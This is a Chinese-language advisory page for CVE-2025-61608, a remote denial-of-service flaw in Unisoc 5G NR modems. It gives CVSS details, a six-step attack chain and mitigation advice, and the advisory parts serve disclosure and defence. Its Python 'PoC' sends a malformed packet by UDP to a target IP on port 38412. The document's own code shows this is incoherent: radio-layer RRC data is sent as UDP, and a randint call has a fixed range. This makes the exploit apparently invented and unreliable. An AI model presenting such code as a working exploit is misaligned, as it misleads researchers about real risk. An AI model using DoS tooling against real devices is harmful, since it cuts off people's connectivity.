CVE-2025-61608: Unisoc NR调制解调器输入验证不当导致远程拒绝服务

漏洞信息

漏洞编号

CVE-2025-61608

漏洞类型

拒绝服务/输入验证不当

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Unisoc NR Modem

漏洞概述

CVE-2025-61608是紫光展锐（Unisoc）NR调制解调器中的一个高危安全漏洞。该漏洞源于NR调制解调器在处理网络输入时缺乏适当的输入验证机制。攻击者可以通过发送特制的网络数据包来触发该漏洞，导致受影响系统崩溃。由于该漏洞具有网络攻击向量（AV:N），且不需要任何认证（PR:N）和用户交互（UI:N），因此具有较高的可利用性。成功利用此漏洞可造成远程拒绝服务（DoS）攻击，使依赖于该调制解调器的设备（如智能手机、物联网设备等）失去通信能力。该漏洞由紫光展锐安全团队（[email protected]）发现并报告，CVSS 3.1评分为7.5分，主要影响系统的可用性（A:H）。

技术细节

该漏洞存在于紫光展锐的5G NR（New Radio）调制解调器组件中。当调制解调器接收到格式不正确或恶意的网络数据包时，由于缺少对输入数据的有效验证和边界检查，可能导致内存处理异常或系统状态错误。具体而言，攻击者可以利用NR协议栈中的缺陷，构造包含异常字段值或超出预期范围的数据包，这些数据包在解析和处理过程中会触发未定义的行为，最终导致调制解调器服务中断。由于调制解调器是基带处理器的一部分，负责所有无线通信功能，其崩溃将导致设备完全失去蜂窝网络连接。此类漏洞通常需要攻击者处于基站覆盖范围内或能够中间人攻击移动流量。

攻击链分析

STEP 1

步骤1

收集目标信息：攻击者识别使用Unisoc NR调制解调器的设备（如特定型号的智能手机或物联网设备）

STEP 2

步骤2

构建攻击环境：攻击者需要位于NR网络覆盖范围内或能够进行流量中间人攻击

STEP 3

步骤3

构造恶意数据包：利用NR协议栈的输入验证缺陷，构造包含异常字段值或超出预期范围的特制数据包

STEP 4

步骤4

发送攻击载荷：通过无线接口发送恶意数据包到目标设备的NR调制解调器

STEP 5

步骤5

触发漏洞：恶意数据包触发调制解调器中的异常处理流程，导致内存处理错误

STEP 6

步骤6

造成拒绝服务：调制解调器服务崩溃，设备失去蜂窝网络连接功能

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61608 PoC - NR Modem Denial of Service
# This PoC demonstrates sending malformed NR protocol messages
# Note: This is for educational/testing purposes only

import socket
import struct
import random

def create_malformed_nr_packet():
    """Create a malformed NR packet to trigger input validation vulnerability"""
    # NR RRC message header
    rrc_pdu = bytearray()
    
    # Malformed length field
    rrc_pdu.extend(struct.pack('>H', 0xFFFF))  # Invalid length
    
    # Malformed PDCP control plane service request
    rrc_pdu.extend(b'\x00\x00\x00\x00')
    
    # Add padding with invalid values
    rrc_pdu.extend(b'\xFF\xFF\xFF\xFF' * 10)
    
    # Add out-of-range values
    rrc_pdu.extend(struct.pack('>I', random.randint(0xFFFFFFFF, 0xFFFFFFFF)))
    
    return bytes(rrc_pdu)

def send_dos_packet(target_ip, port=38412):
    """Send malformed packet to target NR modem"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    malformed_packet = create_malformed_nr_packet()
    
    try:
        print(f"[*] Sending malformed NR packet to {target_ip}:{port}")
        sock.sendto(malformed_packet, (target_ip, port))
        print("[+] Packet sent successfully")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        target = sys.argv[1]
        send_dos_packet(target)
    else:
        print("Usage: python poc.py <target_ip>")

影响范围

Unisoc NR Modem (版本未知)

紫光展锐5G调制解调器固件（受影响的基带版本）

防御指南

临时缓解措施

目前尚无有效的临时缓解措施。建议用户尽快联系设备制造商获取安全更新。在等待官方修复期间，可通过禁用5G NR功能（降级至4G LTE）作为临时规避方案，但这将影响网络性能。如设备支持，可考虑使用其他品牌的设备作为替代。